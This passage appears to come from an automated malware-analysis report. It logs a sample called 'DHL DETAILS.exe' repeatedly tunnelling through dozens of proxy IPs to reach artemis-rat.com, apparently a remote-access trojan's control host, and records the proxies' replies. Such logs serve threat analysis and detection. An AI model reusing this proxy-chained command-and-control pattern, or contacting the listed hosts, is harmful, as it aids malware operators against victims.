                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.770585060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.770611048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781378031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868499041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    203192.168.2.550717104.24.35.152806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.072571039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.227313042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    204192.168.2.55051418.166.142.18010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.080578089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    205192.168.2.55052195.164.89.12388886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.080806971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    206192.168.2.550732185.162.228.170806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.081983089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.239219904 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    207192.168.2.550526161.97.173.42539486352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.094866991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.770612001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    208192.168.2.550689198.8.84.341456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.096540928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    209192.168.2.55093443.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.103990078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    210192.168.2.55093743.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.104732990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    211192.168.2.549778161.97.163.5290456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.105480909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.176935911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.270919085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.270710945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366369009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    212192.168.2.55093943.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.106398106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    213192.168.2.550643174.77.111.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.107800961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    214192.168.2.55094143.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.107964039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    215192.168.2.55057760.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.107985020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    216192.168.2.55052045.138.87.23810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.113202095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    217192.168.2.55053879.110.196.14580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.116378069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    218192.168.2.5507771.0.0.13806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.118102074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.272386074 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    219192.168.2.550779104.25.42.178806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.120441914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.274653912 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    220192.168.2.54975241.65.236.3719816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.123218060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.176934004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.270910978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.270714998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366365910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    221192.168.2.55053551.161.131.84258436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.123218060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    222192.168.2.55056147.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.123341084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    223192.168.2.550487103.127.1.130806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.132870913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.518301964 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    224192.168.2.55071494.131.60.206583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.138740063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    225192.168.2.550612147.75.34.86100106352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.139152050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.441939116 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    226192.168.2.550609116.203.28.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.141527891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.620332003 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    227192.168.2.55058954.233.119.17231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.158931017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.484571934 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    228192.168.2.55065389.38.99.29205516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.159506083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.452539921 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    229192.168.2.550776162.144.233.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.159636021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.645556927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.208081961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
